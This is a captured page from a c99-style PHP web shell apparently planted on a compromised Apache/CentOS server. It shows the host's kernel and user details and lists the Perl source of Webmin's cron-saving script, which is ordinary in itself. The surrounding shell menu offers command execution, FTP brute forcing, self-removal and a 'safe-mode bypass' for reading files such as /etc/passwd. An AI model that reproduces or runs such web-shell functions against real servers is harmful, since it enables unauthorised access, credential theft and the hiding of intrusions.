!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/cron/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_cron.cgi (2.75 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_cron.cgi
# Save an existing cron job, or create a new one

require './cron-lib.pl';
&error_setup($text{'save_err'});
&ReadParse();

@jobs = &list_cron_jobs();
if ($in{'new'}) {
    $access{'create'} || &error($text{'save_ecannot2'});
    $job = { 'type' => 0 };
    }
else {
    $oldjob = $jobs[$in{'idx'}];
    $job->{'type'} = $oldjob->{'type'};
    $job->{'file'} = $oldjob->{'file'};
    $job->{'line'} = $oldjob->{'line'};
    $job->{'nolog'} = $oldjob->{'nolog'};
    }

@files = &unique((map { $_->{'file'} } @jobs),
             "$config{'cron_dir'}/$in{'user'}");
foreach $f (@files) { &lock_file($f); }

# Check and parse inputs
if ($in{"cmd"} !~ /\S/ && $access{'command'}) {
    &error($text{'save_ecmd'});
    }
if (&supports_users()) {
    if (!$in{'user'}) {
        &error($text{'save_euser'});
        }
    if (!defined(getpwnam($in{'user'}))) {
        &error(&text('save_euser2', $in{'user'}));
        }
    }
&parse_times_input($job, \%in);
$in{input} =~ s/\r//g; $in{input} =~ s/%/\\%/g;
$in{cmd} =~ s/%/\\%/g;
$job->{'active'} = $in{'active'};
if ($access{'command'}) {
    $job->{'command'} = $in{'cmd'};
    if ($in{input} =~ /\S/) {
        @inlines = split(/\n/ , $in{input});
        $job->{'command'} .= '%'.join('%' , @inlines);
        }
    }
else {
    $job->{'command'} = $oldjob->{'command'};
    }
$job->{'comment'} = $in{'comment'};
&unconvert_comment($job);

if (&supports_users()) {
    # Check if this user is allowed to execute cron jobs
    &can_use_cron($in{'user'}) ||
        &error(&text('save_eallow', $in{'user'}));
    $job->{'user'} = $in{'user'};
    }

if (defined($in{'range_def'})) {
    # Save range to run
    &parse_range_input($job, \%in);
    &unconvert_range($job);
    }

# Check module access control
&can_edit_user(\%access, $in{'user'}) ||
    &error(&text('save_ecannot', $in{'user'}));

if (!$in{'new'}) {
    # Editing an existing job
    &can_edit_user(\%access, $oldjob->{'user'}) ||
        &error(&text('save_ecannot', $oldjob->{'user'}));
    if ($job->{'user'} eq $oldjob->{'user'}) {
        &change_cron_job($job);
        }
    else {
        &delete_cron_job($oldjob);
        &create_cron_job($job);

        # Find new index, which will change due to user move
        undef(@cron_jobs_cache);
        $in{'idx'} = undef;
        foreach $newjob (&list_cron_jobs()) {
            if ($newjob->{'user'} eq $job->{'user'} &&
                $newjob->{'active'} eq $job->{'active'} &&
                $newjob->{'command'} eq $job->{'command'}) {
                $in{'idx'} = $newjob->{'index'};
                }
            }
        }
    }
else {
    # Creating a new job
    &create_cron_job($job);
    }

foreach $f (@files) { &unlock_file($f); }
if ($in{'new'}) {
    &webmin_log("create", "cron", $in{'user'}, \%in);
    }
else {
    &webmin_log("modify", "cron", $in{'user'}, \%in);
    }

if ($in{'saverun'}) {
    # Redirect to execute form
    defined($in{'idx'}) || &error($text{'save_eidx'});
    &redirect("exec_cron.cgi?idx=$in{'idx'}");
    }
else {
    # Just go back to main menu
    &redirect("");
    }



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.009 ]--